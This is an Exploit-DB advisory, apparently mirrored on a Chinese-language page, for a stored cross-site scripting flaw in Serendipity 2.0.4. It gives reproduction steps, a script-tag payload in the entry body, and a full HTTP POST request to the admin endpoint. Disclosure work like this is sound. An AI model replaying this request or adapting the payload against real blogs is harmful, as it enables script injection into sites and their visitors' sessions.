S9Y Serendipity 2.0.4 – Cross-Site Scripting

• Exploit Database
• 35 阅读

• 作者： Besim
  日期： 2016-10-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40650/

• ========================================
  Title: Serendipity-2.0.4 (latest version) -Stored Cross Site Scripting
  Application: Serendipity
  Class: Sensitive Information disclosure
  Versions Affected:<= latest version 
  Vendor URL: http://docs.s9y.org/
  Software URL: http://docs.s9y.org/downloads.html
  Bugs: Persistent Cross Site Scripting
  Date of found:29.10.2016
  Author: Besim
  ========================================
  
  2.CREDIT
  ========================================
  Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
   
  
  3. VERSIONS AFFECTED
  ========================================
   <= latest version
  
  
  4. TECHNICAL DETAILS & POC
  ========================================
  
   Stored Cross Site Scripting (No Admin Required)
  ========================================
  
  1) Editor login panel
  2) User click 'New Entry'
  3) Attacker(normal user) enter xss payload to 'Entry Body' input 
  4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>
  
  ### HTTP Request###
  
  POST /serendipity/serendipity_admin.php? HTTP/1.1
  Host: site_name
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
  Cookie: ---
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 762
  
  - POST DATA
  
  serendipity[action]=admin
  &serendipity[adminModule]=entries
  &serendipity[adminAction]=save
  &serendipity[id]=
  &serendipity[timestamp]=1477314176
  &serendipity[preview]=false
  &serendipity[token]=324fa32a404e03de978d9a18f86a3338
  &serendipity[title]=New Page
  &serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
  &serendipity[extended]=
  &serendipity[chk_timestamp]=1477314176
  &serendipity[new_timestamp]=2016-10-24 15:02
  &serendipity[isdraft]=false
  &serendipity[allow_comments]=true
  &serendipity[had_categories]=1
  &serendipity[propertyform]=true
  &serendipity[properties][access]=public
  &ignore_password=
  &serendipity[properties][entrypassword]=
  &serendipity[change_author]=4